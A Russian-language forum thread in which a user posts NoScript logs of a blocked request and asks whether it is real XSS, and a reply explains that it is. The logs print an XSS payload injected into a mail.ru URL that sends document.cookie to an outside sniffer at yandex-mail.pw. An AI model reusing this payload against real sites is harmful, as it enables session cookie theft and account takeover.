Скрин http://i.pixs.ru/storage/8/0/3/xsspng_1640134_9974803.png

Данные с консоли

1 ---

[NoScript InjectionChecker] JavaScript Injection in ///data-mrc-config%22%27%3E%3E%3Cinput%3E%3Cscript%3Eimg.src=l ocation.hash.slice(1)+document.cookie;//**/%3C/script%3E/*%3Cinput%3E%3Cp#http://yandex-mail.pw/sn/s.php?

(function anonymous() {

location.hash.slice(1)+document.cookie /* COMMENT_TERMINATOR */

DUMMY_EXPR

})

2 ---

[NoScript XSS] Отфильтрован подозрительный запрос. URL: [https://krugdoveriya.mail.ru/data-mrc-config%22%27%3E%3E%3Cinput%3E%3Cscript%3Eimg.src=l ocation.hash.slice(1)+document.cookie;//**/%3C/script%3E/*%3Cinput%3E%3Cp#http://yandex-mail.pw/sn/s.php?]. Запрос последовал со страницы: [http://o5sms.ru/]. Отфильтрованный адрес: [https://krugdoveriya.mail.ru/data-mrc-config%20%20%3E%3E%20input%3E%20script%3Eimg.src%2 0LOCATION.hash.slice%201%20+DOCUMENT.COOKIE;//**/%20/script%3E/*%20input%3E%20p#5783861931061425911]

3 ---

krugdoveriya.mail.ru : server does not support RFC 5746, see CVE-2009-3555

Интересно узнать, это реально XSS, или нет, и что она делает, ну хочет сделать?

xss, куки от мэйл.ру идут на сниффер. эта пассивка уже не работает.

funny_kaplan said:
xss, куки от мэйл.ру идут на сниффер. эта пассивка уже не работает.


Спасибо, за ответ. Было интересно узнать.

А насколько давно, она перестала работать, примерно хотя бы?